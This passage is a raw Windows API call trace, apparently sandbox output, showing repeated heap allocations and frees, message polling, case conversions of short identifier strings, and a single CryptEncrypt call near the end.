RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0211.610] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.610] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.610] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71be8 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0211.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0211.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73b78 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0211.611] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0211.611] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0211.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0211.611] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae58 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e90 [0211.612] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0211.612] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.612] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.612] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.613] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e90 | out: hHeap=0x2af0000) returned 1 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.613] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0211.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0211.614] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d08 [0211.614] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.614] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.615] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.615] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0211.615] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0211.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8e768 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0211.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0211.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0211.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0211.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0211.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab3b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0211.618] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x3e21, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x3e28) returned 1 [0211.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.618] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.618] 